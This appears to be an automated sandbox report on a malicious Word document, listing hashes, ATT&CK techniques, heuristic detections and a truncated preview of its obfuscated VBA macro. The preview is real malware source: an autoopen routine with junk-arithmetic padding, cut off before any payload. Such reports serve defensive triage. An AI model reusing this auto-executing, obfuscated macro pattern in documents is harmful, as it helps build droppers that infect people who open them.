Office (OLE) malware analysis — malicious · 2b83ed3d9103e35e

MALICIOUS

Office (OLE)

150.9 KB Created: 2019-04-05 12:34:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 296f3024eeec314584736afe0e9b964e SHA-1: 915c145717338fdc60f4e02267d00f8bda204bb4 SHA-256: 2b83ed3d9103e35ebc811b493ead34f4f60acaf05dbc67be7fcfcb8845863eff

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine is present and configured to execute, indicating an attempt to run malicious code upon opening. The presence of GetObject calls and p-code auto-execution further supports this. While the exact payload is not directly visible, the structure strongly suggests it's a downloader for a second-stage exploit.

Heuristics 7

ClamAV: Doc.Malware.00536d-6932000-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6932000-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31386 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	31386 bytes
SHA-256: `d16d8925fa0eac0c4f7c33ba9b4d62d628f55d527f51810bbc27e08f84ee347a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "hkQkBXA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "zAAB1AA" Attribute VB_Base = "0{03D8C51D-3E76-4A2B-92D4-ECC7A6EAD2E7}{A5B7373E-E6C8-4A1D-B36A-8277CE1DD7FA}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "AX1AQk" Attribute VB_Base = "0{CBBD121C-2ED8-4FE0-A1B2-CD5D30AC3D66}{B7B4EAE5-D685-486B-8640-2A131AF5AB7D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "G4GDD4" Function iwB4CX() If 606338906 = 666383500 Then jwUAAAC = 800265766 + Hex(wQAUCQo) + 112256309 / v4wAU_U * (JZ_AkA * CSng(981972793 / CByte(YAAQ1cA)) - fAC1ZAAQ - Sqr(DA1AAQ / 278689676 + 28565801 + CDate(vccZAABA - Sgn(367382793) + JZ4AZ1 * 898108508))) + (7754973 + 829126681 + 814460599 * wcAXAGc) End If If 444000992 = 487442409 Then qDCDkXZ1 = 752939221 + Hex(RBBQU4UA) + 320405955 / iQxABkAA * (MUQBGBZA * CSng(332167598 / CByte(fw_oDABA)) - wAAGAD - Sqr(UDkGADA / 15253373 + 909465096 + CDate(vXcADA - Sgn(311298961) + ZwD4AQ * 253291125))) + (893828359 + 623783325 + 162218269 * c_CZUC) End If End Function Sub autoopen() TB_AAcoA End Sub Function DCAA_oB() If 837509444 = 13256662 Then EA1AAw = 648339908 + Hex(wA4B4AA) + 702925007 / iQXDAA * (dA1A4Uox * CSng(348974770 / CByte(GDACoA)) - MkAkAG - Sqr(poQko_1D / 782550943 + 322476671 + CDate(tcB1cQ - Sgn(34610043) + iACACAAA * 155203454))) + (985608257 + 136150987 + 792762787 * HBx1GA) End If If 165504273 = 420262227 Then qZQDQA = 938102217 + Hex(SoABCAB) + 412060701 / XD4AABDx * (uoABkBUG * CSng(742854937 / CByte(LxD1DDw)) - wQCZACwo - Sqr(VxA4Z_AA / 703137807 + 357007553 + CDate(iZ_wDw - Sgn(322666959) + HDxADA * 236969735))) + (83090737 + 187495052 + 374884522 * z1_AAoA) End If If 227070193 = 334906177 Then SkAAQ1U = 713637544 + Hex(KxAXAk4k) + 489164095 / ABCAoUCX * (PAAkXUo * CSng(669353621 / CByte(SDQQAAQX)) - FBC4D1XB - Sqr(WZA1AAXA / 993448202 + 744096749 + CDate(O__AAAU - Sgn(833963735) + SCA_1QQo * 187486212))) + (16635810 + 4181086 + 321067219 * JZAoBUXk) End If End Function Attribute VB_Name = "akAwQAB" Function ICBAAA1D() If 142505114 = 848699848 Then jCQoBUAZ = 497725971 + Hex(f1ZAGc) + 420932561 / mZQx4A * (ZAUAoU * CSng(683011150 / CByte(pUCkAB)) - WAA1A_UA - Sqr(FXQ1C4 / 736258905 + 4291415 + CDate(jU4ADQ - Sgn(179825284) + KAAQAAU * 638750389))) + (723798843 + 256013966 + 193281786 * wQBUAZ) End If If 908281183 = 402182110 Then EDAA4D = 938428344 + Hex(IZAAxAQ) + 703556760 / KXA4G4A * (mAABZx * CSng(94185553 / CByte(aDXoAAAk)) - SGUGAA - Sqr(SQDAowUD / 291560126 + 533911988 + CDate(HABDXQA - Sgn(348274229) + pBDAZBA * 649607576))) + (575705706 + 82929628 + 338310450 * WAXwcAAx) End If End Function Function TB_AAcoA() On Error Resume Next If 138115491 = 214476140 Then AQBoGX = 864728554 + Hex(iABAAX) + 832274858 / RDDw4BAA * (ZA4wUD * CSng(170831004 / CByte(jUA_CB)) - qG_AAADo - Sqr(pAcADAAD / 320474809 + 60350230 + CDate(JAA4UA - Sgn(711045762) + hQkxGc * 779058464))) + (770843382 + 381536784 + 242471098 * IDxw4D) End If If 953353816 = 149571536 Then VxZBQA1 = 674832449 + Hex(zDcAw_4B) + 1492837 / jAUGkB * (Ik4DABGU * CSng(509835581 / CByte(s1X41oD)) - z_UA_QU - Sqr(vABQAD / 649395149 + 376569709 + CDate(QQADZUA - Sgn(795080199) + FAAAAQ * 697558301))) + (729799797 + 463151164 + 893101993 * P14AQADD) End If If 895421455 = 739676634 Then UQ_QB4 = 551537469 + Hex(jA4GUU_) + 681265826 / MDcAQQw * (BXXQAQAZ * CSng(729509407 / CByte(ww1xBAUB)) - vAkXAA - Sqr( ... (truncated)

SHA-256: d16d8925fa0eac0c4f7c33ba9b4d62d628f55d527f51810bbc27e08f84ee347a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "hkQkBXA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zAAB1AA"
Attribute VB_Base = "0{03D8C51D-3E76-4A2B-92D4-ECC7A6EAD2E7}{A5B7373E-E6C8-4A1D-B36A-8277CE1DD7FA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "AX1AQk"
Attribute VB_Base = "0{CBBD121C-2ED8-4FE0-A1B2-CD5D30AC3D66}{B7B4EAE5-D685-486B-8640-2A131AF5AB7D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "G4GDD4"
Function iwB4CX()
   If 606338906 = 666383500 Then
      jwUAAAC = 800265766 + Hex(wQAUCQo) + 112256309 / v4wAU_U * (JZ_AkA * CSng(981972793 / CByte(YAAQ1cA)) - fAC1ZAAQ - Sqr(DA1AAQ / 278689676 + 28565801 + CDate(vccZAABA - Sgn(367382793) + JZ4AZ1 * 898108508))) + (7754973 + 829126681 + 814460599 * wcAXAGc)
End If
   If 444000992 = 487442409 Then
      qDCDkXZ1 = 752939221 + Hex(RBBQU4UA) + 320405955 / iQxABkAA * (MUQBGBZA * CSng(332167598 / CByte(fw_oDABA)) - wAAGAD - Sqr(UDkGADA / 15253373 + 909465096 + CDate(vXcADA - Sgn(311298961) + ZwD4AQ * 253291125))) + (893828359 + 623783325 + 162218269 * c_CZUC)
End If
End Function
Sub autoopen()
TB_AAcoA
End Sub
Function DCAA_oB()
   If 837509444 = 13256662 Then
      EA1AAw = 648339908 + Hex(wA4B4AA) + 702925007 / iQXDAA * (dA1A4Uox * CSng(348974770 / CByte(GDACoA)) - MkAkAG - Sqr(poQko_1D / 782550943 + 322476671 + CDate(tcB1cQ - Sgn(34610043) + iACACAAA * 155203454))) + (985608257 + 136150987 + 792762787 * HBx1GA)
End If
   If 165504273 = 420262227 Then
      qZQDQA = 938102217 + Hex(SoABCAB) + 412060701 / XD4AABDx * (uoABkBUG * CSng(742854937 / CByte(LxD1DDw)) - wQCZACwo - Sqr(VxA4Z_AA / 703137807 + 357007553 + CDate(iZ_wDw - Sgn(322666959) + HDxADA * 236969735))) + (83090737 + 187495052 + 374884522 * z1_AAoA)
End If
   If 227070193 = 334906177 Then
      SkAAQ1U = 713637544 + Hex(KxAXAk4k) + 489164095 / ABCAoUCX * (PAAkXUo * CSng(669353621 / CByte(SDQQAAQX)) - FBC4D1XB - Sqr(WZA1AAXA / 993448202 + 744096749 + CDate(O__AAAU - Sgn(833963735) + SCA_1QQo * 187486212))) + (16635810 + 4181086 + 321067219 * JZAoBUXk)
End If
End Function

Attribute VB_Name = "akAwQAB"
Function ICBAAA1D()
   If 142505114 = 848699848 Then
      jCQoBUAZ = 497725971 + Hex(f1ZAGc) + 420932561 / mZQx4A * (ZAUAoU * CSng(683011150 / CByte(pUCkAB)) - WAA1A_UA - Sqr(FXQ1C4 / 736258905 + 4291415 + CDate(jU4ADQ - Sgn(179825284) + KAAQAAU * 638750389))) + (723798843 + 256013966 + 193281786 * wQBUAZ)
End If
   If 908281183 = 402182110 Then
      EDAA4D = 938428344 + Hex(IZAAxAQ) + 703556760 / KXA4G4A * (mAABZx * CSng(94185553 / CByte(aDXoAAAk)) - SGUGAA - Sqr(SQDAowUD / 291560126 + 533911988 + CDate(HABDXQA - Sgn(348274229) + pBDAZBA * 649607576))) + (575705706 + 82929628 + 338310450 * WAXwcAAx)
End If
End Function
Function TB_AAcoA()
On Error Resume Next
   If 138115491 = 214476140 Then
      AQBoGX = 864728554 + Hex(iABAAX) + 832274858 / RDDw4BAA * (ZA4wUD * CSng(170831004 / CByte(jUA_CB)) - qG_AAADo - Sqr(pAcADAAD / 320474809 + 60350230 + CDate(JAA4UA - Sgn(711045762) + hQkxGc * 779058464))) + (770843382 + 381536784 + 242471098 * IDxw4D)
End If
   If 953353816 = 149571536 Then
      VxZBQA1 = 674832449 + Hex(zDcAw_4B) + 1492837 / jAUGkB * (Ik4DABGU * CSng(509835581 / CByte(s1X41oD)) - z_UA_QU - Sqr(vABQAD / 649395149 + 376569709 + CDate(QQADZUA - Sgn(795080199) + FAAAAQ * 697558301))) + (729799797 + 463151164 + 893101993 * P14AQADD)
End If
   If 895421455 = 739676634 Then
      UQ_QB4 = 551537469 + Hex(jA4GUU_) + 681265826 / MDcAQQw * (BXXQAQAZ * CSng(729509407 / CByte(ww1xBAUB)) - vAkXAA - Sqr(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.